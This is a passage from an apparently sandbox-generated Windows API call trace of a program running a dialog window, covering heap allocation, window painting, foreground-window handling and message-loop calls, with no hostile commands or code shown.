Flags=0x0, Size=0x8) returned 0xed4d10 [0254.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xee8378 [0254.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4dd0 [0254.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee8378 | out: hHeap=0xc60000) returned 1 [0254.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dd0 | out: hHeap=0xc60000) returned 1 [0254.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d10 | out: hHeap=0xc60000) returned 1 [0254.812] ShowWindow (hWnd=0x50150, nCmdShow=5) returned 0 [0254.812] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.812] NtdllDialogWndProc_W () returned 0x0 [0254.812] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.812] NtdllDialogWndProc_W () returned 0x0 [0254.822] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.822] NtdllDialogWndProc_W () returned 0x0 [0254.822] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.822] NtdllDialogWndProc_W () returned 0x0 [0254.823] NtdllDefWindowProc_W () returned 0x0 [0254.823] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.823] NtdllDialogWndProc_W () returned 0x1 [0254.828] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.828] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.828] NtdllDialogWndProc_W () returned 0x0 [0254.872] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.872] NtdllDialogWndProc_W () returned 0x0 [0254.873] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.873] NtdllDialogWndProc_W () returned 0x0 [0254.873] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.873] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.873] NtdllDialogWndProc_W () returned 0x0 [0254.873] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.873] NtdllDialogWndProc_W () returned 0x0 [0254.873] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.873] NtdllDialogWndProc_W () returned 0x0 [0254.874] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.874] NtdllDialogWndProc_W () returned 0x0 [0254.875] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.875] NtdllDialogWndProc_W () returned 0x1 [0254.875] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.875] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.875] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.875] SetBkColor (hdc=0x23010712, color=0xf0f0f0) returned 0xffffff [0254.875] CreateSolidBrush (color=0xf0f0f0) returned 0x451007ac [0254.875] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7b090 [0254.875] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7b0c0 [0254.876] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.876] NtdllDialogWndProc_W () returned 0x0 [0254.876] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.876] NtdllDialogWndProc_W () returned 0x0 [0254.886] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.886] NtdllDialogWndProc_W () returned 0x0 [0254.887] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.887] NtdllDialogWndProc_W () returned 0x1 [0254.887] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.887] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.887] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.887] SetBkColor (hdc=0x23010712, color=0xf0f0f0) returned 0xf0f0f0 [0254.888] GetForegroundWindow () returned 0x100ea [0254.888] IsIconic (hWnd=0x50150) returned 0 [0254.888] SetForegroundWindow (hWnd=0x50150) returned 0 [0254.888] GetWindowThreadProcessId (in: hWnd=0x100ea, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x3a4 [0254.888] GetCurrentThreadId () returned 0x2ac [0254.888] GetWindowThreadProcessId (in: hWnd=0x50150, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x2ac [0254.888] AttachThreadInput (idAttach=0x2ac, idAttachTo=0x2ac, fAttach=1) returned 0 [0254.888] AttachThreadInput (idAttach=0x2ac, idAttachTo=0x3a4, fAttach=1) returned 1 [0254.892] AttachThreadInput (idAttach=0x3a4, idAttachTo=0x2ac, fAttach=1) returned 1 [0254.892] SetForegroundWindow (hWnd=0x50150) returned 1 [0254.892] AttachThreadInput (idAttach=0x2ac, idAttachTo=0x2ac, fAttach=0) returned 0 [0254.892] AttachThreadInput (idAttach=0x2ac, idAttachTo=0x3a4, fAttach=0) returned 1 [0254.894] AttachThreadInput (idAttach=0x3a4, idAttachTo=0x2ac, fAttach=0) returned 1 [0254.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b108 | out: hHeap=0xc60000) returned 1 [0254.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec840 | out: hHeap=0xc60000) returned 1 [0254.895] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0254.895] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.895] NtdllDialogWndProc_W () returned 0x0 [0254.895] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.895] NtdllDialogWndProc_W () returned 0x0 [0254.895] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.895] NtdllDialogWndProc_W () returned 0x0 [0254.895] TranslateMessage (lpMsg=0x87fa94) returned 0 [0254.895] DispatchMessageW (lpMsg=0x87fa94) returned 0x0 [0254.895] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0254.895] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.895] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.895] NtdllDialogWndProc_W () returned 0x0 [0254.896] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0254.896] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.896] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.896] NtdllDialogWndProc_W () returned 0x0 [0254.896] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0254.896] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0254.896] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.896] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.896] BeginPaint (in: hWnd=0x50150, lpPaint=0x87f788 | out: lpPaint=0x87f788) returned 0x23010712 [0254.896] EndPaint (hWnd=0x50150, lpPaint=0x87f788) returned 1 [0254.896] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0254.896] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0254.897] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.897] NtdllDialogWndProc_W () returned 0x1 [0254.897] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.897] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.897] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.897] SetBkColor (hdc=0x2b0101d9, color=0xf0f0f0) returned 0xffffff [0254.897] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.897] NtdllDialogWndProc_W () returned 0x0 [0254.897] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.897] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.897] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.897] SetBkColor (hdc=0x2b0101d9, color=0xf0f0f0) returned 0xf0f0f0 [0254.897] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.897] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.897] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0254.897] NtdllDialogWndProc_W () returned 0x0 [0254.897] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.897] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.897] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0254.897] NtdllDialogWndProc_W () returned 0x0 [0254.898] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0254.898] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0254.898] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.898] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.898] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0254.898] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0254.898] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.898] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0x0 [0254.898] SetBkColor (hdc=0x270101c5, color=0x0) returned 0xffffff [0254.898] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.898] NtdllDialogWndProc_W () returned 0x1 [0254.898] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.898] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.898] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.898] SetBkColor (hdc=0x270101c5, color=0xf0f0f0) returned 0x0 [0254.899] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.899] NtdllDialogWndProc_W () returned 0x0 [0254.900] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.900] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.900] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0254.900] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0254.900] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.900] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0x0 [0254.900] SetBkColor (hdc=0x270101c5, color=0x0) returned 0xffffff [0254.900] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.900] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.900] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0254.900] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0254.900] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.900] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0xff00 [0254.900] SetBkColor (hdc=0x270101c5, color=0x0) returned 0x0 [0254.900] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.900] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.900] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0254.900] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0254.900] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.900] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0xff00 [0254.900] SetBkColor (hdc=0x270101c5, color=0x0) returned 0x0 [0254.904] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0254.904] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0254.905] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.905] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.905] GetWindowLongW (hWnd=0x90164, nIndex=-21) returned 5 [0254.905] GetWindowLongW (hWnd=0x90164, nIndex=-21) returned 5 [0254.905] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.905] SetTextColor (hdc=0x270101c5, color=0x0) returned 0x0 [0254.905] SetBkColor (hdc=0x270101c5, color=0xf0f0f0) returned 0xffffff [0254.907] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0254.907] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0254.908] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.908] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.908] GetWindowLongW (hWnd=0x400a2, nIndex=-21) returned 6 [0254.908] GetWindowLongW (hWnd=0x400a2, nIndex=-21) returned 6 [0254.908] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.908] GetWindowLongW (hWnd=0x400a2, nIndex=-16) returned 1342242944 [0254.908] GetSysColor (nIndex=5) returned 0xffffff [0254.908] GetSysColor (nIndex=8) returned 0x0 [0254.908] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0254.908] SetBkColor (hdc=0xd010720, color=0xffffff) returned 0xffffff [0254.908] CreateSolidBrush (color=0xffffff) returned 0x3a1001cb [0254.909] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7b108 [0254.909] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7afd0 [0254.910] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.910] NtdllDialogWndProc_W () returned 0x1 [0254.910] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.910] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.910] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.910] SetBkColor (hdc=0x1c0106d5, color=0xf0f0f0) returned 0xffffff [0254.910] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.910] NtdllDialogWndProc_W () returned 0x0 [0254.911] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.911] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.911] GetWindowLongW (hWnd=0x400a2, nIndex=-21) returned 6 [0254.911] GetWindowLongW (hWnd=0x400a2, nIndex=-21) returned 6 [0254.911] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.911] GetWindowLongW (hWnd=0x400a2, nIndex=-16) returned 1342242944 [0254.911] GetSysColor (nIndex=5) returned 0xffffff [0254.911] GetSysColor (nIndex=8) returned 0x0 [0254.911] SetTextColor (hdc=0x1d0106d5, color=0x0) returned 0x0 [0254.911] SetBkColor (hdc=0x1d0106d5, color=0xffffff) returned 0xffffff [0254.914] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0254.914] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0254.915] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.915] NtdllDialogWndProc_W () returned 0x1 [0254.915] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.915] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.915] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.915] SetBkColor (hdc=0x1e0106d5, color=0xf0f0f0) returned 0xffffff [0254.915] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.915] NtdllDialogWndProc_W () returned 0x0 [0254.915] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.915] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.915] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.915] SetBkColor (hdc=0x1e0106d5, color=0xf0f0f0) returned 0xf0f0f0 [0254.915] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.915] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.915] GetWindowLongW (hWnd=0x3010a, nIndex=-21) returned 7 [0254.915] NtdllDialogWndProc_W () returned 0x0 [0254.915] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.915] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.915] GetWindowLongW (hWnd=0x3010a, nIndex=-21) returned 7 [0254.915] NtdllDialogWndProc_W () returned 0x0 [0254.916] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0254.916] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0254.916] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.916] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.916] GetWindowLongW (hWnd=0x3015e, nIndex=-21) returned 8 [0254.916] GetWindowLongW (hWnd=0x3015e, nIndex=-21) returned 8 [0254.916] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.916] GetWindowLongW (hWnd=0x3015e, nIndex=-16) returned 1342179332 [0254.916] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.916] GetSysColor (nIndex=8) returned 0x0 [0254.916] SetTextColor (hdc=0x270101c5, color=0x0) returned 0x0 [0254.916] SetBkColor (hdc=0x270101c5, color=0xf0f0f0) returned 0xffffff [0254.918] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.918] NtdllDialogWndProc_W () returned 0x1 [0254.918] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.918] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.918] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.918] SetBkColor (hdc=0x2d0101d9, color=0xf0f0f0) returned 0xffffff [0254.918] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.918] NtdllDialogWndProc_W () returned 0x0 [0254.919] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.919] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.919] GetWindowLongW (hWnd=0x3015e, nIndex=-21) returned 8 [0254.919] GetWindowLongW (hWnd=0x3015e, nIndex=-21) returned 8 [0254.919] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.919] GetWindowLongW (hWnd=0x3015e, nIndex=-16) returned 1342179332 [0254.919] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.919] GetSysColor (nIndex=8) returned 0x0 [0254.919] SetTextColor (hdc=0x270101c5, color=0x0) returned 0x0 [0254.919] SetBkColor (hdc=0x270101c5, color=0xf0f0f0) returned 0xffffff [0254.919] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.919] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.919] GetWindowLongW (hWnd=0x3015e, nIndex=-21) returned 8 [0254.919] GetWindowLongW (hWnd=0x3015e, nIndex=-21) returned 8 [0254.919] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.919] GetWindowLongW (hWnd=0x3015e, nIndex=-16) returned 1342179332 [0254.919] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.919] GetSysColor (nIndex=8) returned 0x0 [0254.919] SetTextColor (hdc=0x270101c5, color=0x0) returned 0x0 [0254.919] SetBkColor (hdc=0x270101c5, color=0xf0f0f0) returned 0xf0f0f0 [0254.919] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.919] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.919] GetWindowLongW (hWnd=0x3015e, nIndex=-21) returned 8 [0254.919] GetWindowLongW (hWnd=0x3015e, nIndex=-21) returned 8 [0254.919] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.919] GetWindowLongW (hWnd=0x3015e, nIndex=-16) returned 1342179332 [0254.920] GetSysColor (nIndex=15) returned 0xf0f0f0 [0254.920] GetSysColor (nIndex=8) returned 0x0 [0254.920] SetTextColor (hdc=0x270101c5, color=0x0) returned 0x0 [0254.920] SetBkColor (hdc=0x270101c5, color=0xf0f0f0) returned 0xf0f0f0 [0254.921] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0254.921] TranslateMessage (lpMsg=0x87fa94) returned 0 [0254.921] DispatchMessageW (lpMsg=0x87fa94) returned 0x0 [0254.922] GetForegroundWindow () returned 0x50150 [0254.922] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.922] GetCursorPos (in: lpPoint=0x87f8d0 | out: lpPoint=0x87f8d0*(x=577, y=534)) returned 1 [0254.922] ScreenToClient (in: hWnd=0x50150, lpPoint=0x87f8d0 | out: lpPoint=0x87f8d0) returned 1 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xe978f0 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7af70 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.922] GetAsyncKeyState (vKey=1) returned 0 [0254.922] GetAsyncKeyState (vKey=2) returned 0 [0254.922] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec840 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78a68 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d30 [0254.922] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78a68 | out: hHeap=0xc60000) returned 1 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec4a8 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78a68 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78a98 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4d80 [0254.922] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d80 | out: hHeap=0xc60000) returned 1 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4d80 [0254.922] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d80 | out: hHeap=0xc60000) returned 1 [0254.922] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78a98 | out: hHeap=0xc60000) returned 1 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d80 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xefb938 [0254.922] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4d00 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cc0 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78a98 [0254.923] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cc0 | out: hHeap=0xc60000) returned 1 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7afa0 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7afb8 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7afe8 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4cc0 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.923] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78a98 | out: hHeap=0xc60000) returned 1 [0254.923] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78a98 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78c78 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4cd0 [0254.923] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.923] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.923] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78c78 | out: hHeap=0xc60000) returned 1 [0254.923] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec480 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78c78 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4cb0 [0254.923] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x6) returned 0xed4cd0 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x82) returned 0xd8f178 [0254.923] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.923] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd8f178 | out: hHeap=0xc60000) returned 1 [0254.923] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.923] CreateAcceleratorTableW (paccel=0xed4cd0, cAccel=1) returned 0x60175 [0254.925] GetForegroundWindow () returned 0x50150 [0254.925] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.925] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cb0 | out: hHeap=0xc60000) returned 1 [0254.925] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78c78 | out: hHeap=0xc60000) returned 1 [0254.925] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec480 | out: hHeap=0xc60000) returned 1 [0254.925] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.925] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.925] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cb0 [0254.925] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cb0 | out: hHeap=0xc60000) returned 1 [0254.925] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57b8 [0254.925] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.925] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cb0 [0254.925] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78c78 [0254.925] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4cd0 [0254.925] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.925] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7af70 | out: hHeap=0xc60000) returned 1 [0254.925] 